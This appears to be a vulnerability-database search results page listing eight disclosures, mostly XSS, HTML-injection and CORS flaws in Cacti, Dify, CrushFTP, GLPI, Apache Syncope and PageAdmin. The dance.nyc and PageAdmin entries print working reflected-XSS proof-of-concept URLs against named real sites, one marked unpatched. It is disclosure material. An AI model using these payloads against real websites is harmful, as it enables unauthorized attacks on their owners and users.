Lucene search

8 matches found

Cvelist
added 2026/01/29 12:0 a.m., 28 views

CVE-2025-45160

An HTML injection vulnerability exists in the file upload functionality of Cacti , , into the rendered page. NOTE: Multiple third parties including the maintainer have stated that they cannot reproduce this issue after 1.2.27...

0.002 EPSS
Exploits: 1, References: 2
ATTACKERKB
added 2025/12/18 12:0 a.m., 4 views

CVE-2025-63386

A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/setup endpoint. The endpoint implements an insecure CORS policy that reflects any Origin header and enables Access-Control-Allow-Credentials: true, permitting arbitrary external domains t...

9.1 CVSS, 5.7 AI score, 0.00212 EPSS
Exploits: 0, References: 4
Positive Technologies
added 2025/11/12 12:0 a.m., 3 views

PT-2025-46678

Name of the Vulnerable Software and Affected Versions: CrushFTP version 11.3.6 48
Description: A Cross Site Scripting (XSS) issue exists in CrushFTP. The web-based server’s file sharing feature reflects the filename to an email body field without proper sanitization, leading to potential HTML...

6.1 CVSS, 5.9 AI score, 0.002 EPSS
Exploits: 1, References: 7
Openbugbounty
added 2022/11/25 11:55 a.m., 11 views

ltv-online.info Cross Site Scripting vulnerability OBB-3070460

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

6.2 AI score
Exploits: 0
CNNVD
added 2022/11/17 12:0 a.m., 2 views

GLPI cross-site scripting vulnerability

GLPI is an open source IT and asset management software for individual developers. The software provides a full-featured IT resource management interface that you can use to build databases to fully manage IT computers, monitors, servers, printers, network devices, phones, and even toner cartridg...

6.1 CVSS, 6 AI score, 0.00361 EPSS
Exploits: 0, References: 4
Cvelist
added 2020/05/04 12:27 p.m., 15 views

CVE-2019-17557

It was found that the Apache Syncope EndUser UI login page prior to 2.0.15 and 2.1.6 reflects the successMessage parameters. By this means, a user accessing the Enduser UI could execute JavaScript code from URL query string...

5.6 AI score, 0.0122 EPSS
Exploits: 0, References: 1
Openbugbounty
added 2016/11/02 10:52 a.m., 10 views

dance.nyc XSS vulnerability

Vulnerable URL: https://www.dance.nyc/search/?dir=%3C/script%3E%3Cscript%3Ealert'OPENBUGBOUNTY';%3C/script%3E%3Cscript%3E

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 27.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 759468

VIP...

6.3 AI score
Exploits: 0
seebug.org
added 2014/07/02 12:0 a.m., 16 views

Reflected XSS in the latest version of PageAdmin

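Brief description: http://demo.pageadmin.net/ Reflected XSS in the latest version of PageAdmin. Details: Construct the ID parameter, using a double quote to close what precedes it. HTML code can then be injected. http://demo.pageadmin.net/e/aspx/advnew.aspx?id=1" http://demo.pageadmin.net/e/aspx/advnew.aspx?id=1%22%3C/div%3E%3Cimg/src=1%20onerror=alert%28/XSS/%29%3E Proof of vulnerability:...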

7.1 AI score
Exploits: 0